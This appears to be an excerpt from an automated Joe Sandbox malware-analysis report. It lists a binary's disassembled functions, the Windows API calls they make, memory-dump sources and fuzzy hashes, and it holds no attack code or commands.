                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 9d2fc5f9c1928b927da583a7952d107a93cf7fda0d3898b8493451b9d817267b
                                                                                                                                                                                                                                                                          • Instruction ID: 84aae2476e794645462057cb7f8389e1cf6072222b192e07c7d651d9bda36901
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d2fc5f9c1928b927da583a7952d107a93cf7fda0d3898b8493451b9d817267b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A218C71608215AFD731DFA5EC48D5A77AABF813687128525FA28F7641EF31EC408BA0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 6A584CC9
                                                                                                                                                                                                                                                                            • Part of subcall function 6A58390C: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6A57E885,?,00000000,-00000008), ref: 6A5839B8
                                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6A584D01
                                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6A584D21
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 158306478-0
                                                                                                                                                                                                                                                                          • Opcode ID: 96eeccfa64f87c4247c0d2472422f307a939c19ca540831e713e2be375fbf8cc
                                                                                                                                                                                                                                                                          • Instruction ID: c199b219924d15f78d3682fed567d7c8f81148fa3a171e74f83faef81a8f717e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96eeccfa64f87c4247c0d2472422f307a939c19ca540831e713e2be375fbf8cc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7311C8F2A066697FA752D7B64C8CC6F7ABCEE862983130515FD01E2141EF74CD0245B1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?,DF534560), ref: 001D162A
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,DF534560), ref: 001D1637
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 001D1688
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                                                                                                                          • String ID: v
                                                                                                                                                                                                                                                                          • API String ID: 3991485460-3261393531
                                                                                                                                                                                                                                                                          • Opcode ID: c6c6f1cb4a69ee884e0565c4a4a828ef53c7810497b522ada666d7f65c25c757
                                                                                                                                                                                                                                                                          • Instruction ID: 34100b58657efb75f099c48337a2369eb303854c837ed1216a207a26f220d4a5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6c6f1cb4a69ee884e0565c4a4a828ef53c7810497b522ada666d7f65c25c757
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C21B176900254AFDF12CF64C840BE9BBB4EF16314F1401AAEC59AB382D7319906CB60
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?,DF534560), ref: 001D171A
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,DF534560), ref: 001D1727
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 001D176E
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                                                                                                                          • String ID: v
                                                                                                                                                                                                                                                                          • API String ID: 3991485460-3261393531
                                                                                                                                                                                                                                                                          • Opcode ID: 42d06f8015e508fcec4c517729b76b0ab5f75d98ed0445b16e9f111fb2108a43
                                                                                                                                                                                                                                                                          • Instruction ID: 9a0585f83a2262d016ece8467bbc7c3d2af94c8521c23fbef2b0a8c5da2b4128
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42d06f8015e508fcec4c517729b76b0ab5f75d98ed0445b16e9f111fb2108a43
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C821C176900344EFDF12CF64C840BA9BBB4FF16325F1005A9ED59AB392D731A905CBA0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?,DF534560,?), ref: 001D155D
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,DF534560,?), ref: 001D156A
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 001D1592
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                                                                                                                          • String ID: v
                                                                                                                                                                                                                                                                          • API String ID: 3991485460-3261393531
                                                                                                                                                                                                                                                                          • Opcode ID: 84050eb5b988bf1f5ff6002d505b6b48a0a0e1612818b16788cd0f4cf6d16636
                                                                                                                                                                                                                                                                          • Instruction ID: 306379228b03cfcece34f11cdbd3141d0d7f4f209e5f63eff12df2e9ec5a03c7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84050eb5b988bf1f5ff6002d505b6b48a0a0e1612818b16788cd0f4cf6d16636
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6721B476904355AFCF02CF64D840BE9BF74EB57324F1001AAD85AA7382D7369A09CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6A5894DC,?,00000001,?,?,?,6A580032,?,?,00000000), ref: 6A58AEE3
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,6A5894DC,?,00000001,?,?,?,6A580032,?,?,00000000,?,?,?,6A5805B9,?), ref: 6A58AEEF
                                                                                                                                                                                                                                                                            • Part of subcall function 6A58AEB5: CloseHandle.KERNEL32(FFFFFFFE,6A58AEFF,?,6A5894DC,?,00000001,?,?,?,6A580032,?,?,00000000,?,?), ref: 6A58AEC5
                                                                                                                                                                                                                                                                          • ___initconout.LIBCMT ref: 6A58AEFF
                                                                                                                                                                                                                                                                            • Part of subcall function 6A58AE77: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6A58AEA6,6A5894C9,?,?,6A580032,?,?,00000000,?), ref: 6A58AE8A
                                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6A5894DC,?,00000001,?,?,?,6A580032,?,?,00000000,?), ref: 6A58AF14
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2744216297-0
                                                                                                                                                                                                                                                                          • Opcode ID: c9dc5cc8ad292c15e87cad4ba80d7a20456c94044c905acd101b297e65de0676
                                                                                                                                                                                                                                                                          • Instruction ID: 4fe92d0de9ae47dfee2e2a9aa5fc55f5fbb67ba8d9e21e747c7566722de9b84d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9dc5cc8ad292c15e87cad4ba80d7a20456c94044c905acd101b297e65de0676
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45F0F876241568BBCF529F918C0898A3FB6FB497A0B024015FB1A96160CB328C219BA5
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • PathIsUNCW.SHLWAPI(?,?,?,?,?,AA831995,?,?,00000000), ref: 6A55BAC7
                                                                                                                                                                                                                                                                            • Part of subcall function 6A547520: #8.MSI(80070057,AA831995,00000000,6A58C150,000000FF,?,?,00000000,00000000,AA831995,?,6A58C4AD,000000FF,?,6A55BEBE), ref: 6A5475F9
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Path
                                                                                                                                                                                                                                                                          • String ID: \\?\$\\?\UNC\
                                                                                                                                                                                                                                                                          • API String ID: 2875597873-3019864461
                                                                                                                                                                                                                                                                          • Opcode ID: 04242019286a49431723d669e68f7109b0b33f2fcce522d795fde7be75562528
                                                                                                                                                                                                                                                                          • Instruction ID: 865aedee1e9d070cf84435b301dcaf3e6585c547e479ad5f88101bc278a346ef
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04242019286a49431723d669e68f7109b0b33f2fcce522d795fde7be75562528
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4A1B371A0150ADFDB00DFA8C848BAEF7B5FF55324F12825AD415AB292EF75AD01CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6A55F7A3
                                                                                                                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6A55F9E2
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6A55FA1D
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6A55FA40
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6A55FA68
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6A55FB07
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Lockitstd::_$Concurrency::cancel_current_taskLockit::_Lockit::~_
                                                                                                                                                                                                                                                                          • String ID: false$true
                                                                                                                                                                                                                                                                          • API String ID: 2115809835-2658103896
                                                                                                                                                                                                                                                                          • Opcode ID: a17845280372b69f7abaa96e9ac248881fb8c10bce0e8eb435dfc6fa1c3ec37c
                                                                                                                                                                                                                                                                          • Instruction ID: 95fad1c201d16dc599cc04004ea0017039b3141f49453a64d93d50bf10b8f5b1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a17845280372b69f7abaa96e9ac248881fb8c10bce0e8eb435dfc6fa1c3ec37c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA91D2B1D003489BDB10CFA4C944B9EBBF8FF45304F15426AE845AB242FB75AA48CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 6A547E10: GetProcessHeap.KERNEL32 ref: 6A547E6C
                                                                                                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 6A5609D9
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: HeapProcess_wcschr
                                                                                                                                                                                                                                                                          • String ID: @$+,/:;=?&%<>{}[]()#^!*'$%%%X
                                                                                                                                                                                                                                                                          • API String ID: 1401547090-362521357
                                                                                                                                                                                                                                                                          • Opcode ID: efbcc39f923711581cba3ce55ed97a96254597d9b818bc6d0995e1cd306056ad
                                                                                                                                                                                                                                                                          • Instruction ID: fa67c8f9afa525d0807863947849553088cb338454c9bff5c2ce30e0e18fbaee
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efbcc39f923711581cba3ce55ed97a96254597d9b818bc6d0995e1cd306056ad
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3916B71A016199FDB00DFA8C858B9EFBF5FF49314F11865AE915AB3A1DB34AD00CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00349842: EnterCriticalSection.KERNEL32(00459EA0,-00000010,?,?,001B9EC6,0045AAD4,DF534560,?,?,0037191D,000000FF,?,001BCB1F,DF534560,-00000010,?), ref: 0034984D
                                                                                                                                                                                                                                                                            • Part of subcall function 00349842: LeaveCriticalSection.KERNEL32(00459EA0,?,001B9EC6,0045AAD4,DF534560,?,?,0037191D,000000FF,?,001BCB1F,DF534560,-00000010,?,?,00000008), ref: 0034988A
                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 002014CD
                                                                                                                                                                                                                                                                            • Part of subcall function 003497F8: EnterCriticalSection.KERNEL32(00459EA0,?,?,001B9F37,0045AAD4,003CA720), ref: 00349802
                                                                                                                                                                                                                                                                            • Part of subcall function 003497F8: LeaveCriticalSection.KERNEL32(00459EA0,?,001B9F37,0045AAD4,003CA720), ref: 00349835
                                                                                                                                                                                                                                                                            • Part of subcall function 003497F8: RtlWakeAllConditionVariable.NTDLL ref: 003498AC
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                                                                                                                                                                                                                          • String ID: ItemData$Windows.UI.Xaml.Controls.ListViewItem
                                                                                                                                                                                                                                                                          • API String ID: 2296764815-2445763458
                                                                                                                                                                                                                                                                          • Opcode ID: 8ddec24a593b3dc9ee6b996d8e54da67e9c3907ef3c1e4ddd7a87c4e51115e0c
                                                                                                                                                                                                                                                                          • Instruction ID: b7c1d019f0ed7d59f993ee38e219b9cdae1b33517aa142f7ad4d93782bb7edb3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ddec24a593b3dc9ee6b996d8e54da67e9c3907ef3c1e4ddd7a87c4e51115e0c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F871B070910389DFDB11CFA8C9057DEBBB0BF15314F144269E4156B3D2D7B95A18CBA2
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • PathIsUNCW.SHLWAPI(00000000,AA831995), ref: 6A5587F1
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Path
                                                                                                                                                                                                                                                                          • String ID: \\?\$\\?\UNC\
                                                                                                                                                                                                                                                                          • API String ID: 2875597873-3019864461
                                                                                                                                                                                                                                                                          • Opcode ID: e633c9ffe1c1e437bee0eaa836ec6b8d072662d780c4973ccb7aa5617dbd7382
                                                                                                                                                                                                                                                                          • Instruction ID: 1554ae7522b448c2f747b5b2b93097cc53592be2322841bf6f17e9a816be21ed
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e633c9ffe1c1e437bee0eaa836ec6b8d072662d780c4973ccb7aa5617dbd7382
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4051D3B0D10204ABDB14CF68D885BAEB7F5FF85304F11851ED90267282EF75AD58CBA2
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 003616FD: RtlFreeHeap.NTDLL(00000000,00000000,?,0036A60F,?,00000000,?,?,0036A8B0,?,00000007,?,?,0036AD02,?,?), ref: 00361713
                                                                                                                                                                                                                                                                            • Part of subcall function 003616FD: GetLastError.KERNEL32(?,?,0036A60F,?,00000000,?,?,0036A8B0,?,00000007,?,?,0036AD02,?,?), ref: 0036171E
                                                                                                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 0036ABAF
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                          • String ID: X2E$p0E
                                                                                                                                                                                                                                                                          • API String ID: 4068849827-4138130148
                                                                                                                                                                                                                                                                          • Opcode ID: 3afa070246ae35d29a270db83cf3b759881b0a338fd993c2963f833e7547a98e
                                                                                                                                                                                                                                                                          • Instruction ID: ccba726687da77da7a71663cebb5bce0630fde6b89f4b5527f945792d9f295b5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3afa070246ae35d29a270db83cf3b759881b0a338fd993c2963f833e7547a98e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71318D71604B059FEB23AA39D845B5A73EAAF00351F19C41AE459EB199DF70FC80CF15
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • #7.OLEAUT32(?,?,AA831995), ref: 6A5631BA
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
